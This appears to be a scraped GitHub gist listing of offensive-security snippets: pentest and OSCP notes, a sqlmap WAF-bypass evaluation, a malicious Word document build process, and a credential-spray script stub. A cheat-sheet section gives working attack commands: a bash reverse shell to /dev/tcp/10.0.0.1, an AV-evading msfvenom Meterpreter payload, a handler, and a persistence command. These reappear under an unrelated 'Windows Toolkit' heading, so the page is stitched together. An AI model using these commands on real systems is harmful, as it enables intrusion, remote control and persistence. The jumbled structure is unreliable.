Never Mind secfb

## offsec.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / offsec.md
            
            
              Created
              April 26, 2018 07:25
                — forked from jivoi/offsec.md
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## secnot
python -c 'import pty; pty.spawn("/bin/sh")'

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe

msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run"

run persistence -A -i 10 -p 6767 -r 192.168.0.24

## enum.sh
#!/bin/bash

BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"

## how-to-oscp-final.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / how-to-oscp-final.md
            
            
              Created
              May 17, 2018 10:43
                — forked from unfo/how-to-oscp-final.md
            
          
    How to pass the OSCP


Recon
Find vuln
Exploit
Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

  
## sqlmap-tamper-scripts-evaluation.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / sqlmap-tamper-scripts-evaluation.md
            
            
              Created
              May 26, 2018 22:32
                — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
            
              
                SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
              
          
    SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.

  
## muti-stage-1.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / muti-stage-1.md
            
            
              Created
              May 26, 2018 22:35
                — forked from mgeeky/muti-stage-1.md
            
              
                Multi-Stage Malicious Document creation process (ala APT)
              
          
    Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.
The resulted document will be:

using OLE event autorun method
removing it's pretext shapes
Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
Leveraging certutil technique to receive Base64 encoded malicious HTA document
Having Base64 encoded Powershell command in that Author property


## smb_cme_credspray.sh
#!/bin/bash

HOST="$1"
USERS="$2"
PASSWORDS="$3"
SLEEP="$4"

EMAIL="idrinkyourmilkshake@foobarbbq.com"
TEXT="7205551234@mms.att.net"

## CTFWRITE-Optimum-HTB.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / CTFWRITE-Optimum-HTB.md
            
            
              Created
              May 28, 2018 12:23
                — forked from berzerk0/CTFWRITE-Optimum-HTB.md
            
              
                CTF-Writeup: Optimum @ HackTheBox
              
          
    This gist has been DEPRECATED.

The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html

Updates will be reflected on GITPAGE VERSIONS ONLY

CTF Writeup: Optimum on HackTheBox

30 October 2017

Introduction

This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up.
The steps are directed towards beginners, just like the box.

  
## matryoshka.sh
#!/bin/bash
LIMIT=500  #number of cycles
for ((i=1; i <= LIMIT ; i++)) do
 find . -name '*.rar' -exec unrar e {} \; -exec rm {} \; #rar file
 #find . -name '*.7z' -exec 7za e {} \; -exec rm {} \; # 7z file
 #find . -name '*.zip' -exec unzip {} \; -exec rm {} \; #zip file
done

#recursive file rar,zip,7z you can open the files with this script.
#Матрёшка,Matryoshka CTF

## windows-toolkit.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                secfb
                / windows-toolkit.md
            
            
              Created
              December 28, 2018 11:49
                — forked from jthuraisamy/windows-toolkit.md
            
              
                Windows Toolkit
              
          
    Windows Toolkit

Binary

Native Binaries


IDA Pro


IDA Plugins
Preferred
Neutral
Unreviewed
	python -c 'import pty; pty.spawn("/bin/sh")'

	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe

	msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run"

	run persistence -A -i 10 -p 6767 -r 192.168.0.24
	#!/bin/bash

	BLACK="\033[30m"
	RED="\033[31m"
	GREEN="\033[32m"
	YELLOW="\033[33m"
	BLUE="\033[34m"
	PINK="\033[35m"
	CYAN="\033[36m"
	WHITE="\033[37m"
	#!/bin/bash

	HOST="$1"
	USERS="$2"
	PASSWORDS="$3"
	SLEEP="$4"

	EMAIL="idrinkyourmilkshake@foobarbbq.com"
	TEXT="7205551234@mms.att.net"
	#!/bin/bash
	LIMIT=500 #number of cycles
	for ((i=1; i <= LIMIT ; i++)) do
	find . -name '*.rar' -exec unrar e {} \; -exec rm {} \; #rar file
	#find . -name '*.7z' -exec 7za e {} \; -exec rm {} \; # 7z file
	#find . -name '*.zip' -exec unzip {} \; -exec rm {} \; #zip file
	done

	#recursive file rar,zip,7z you can open the files with this script.
	#Матрёшка,Matryoshka CTF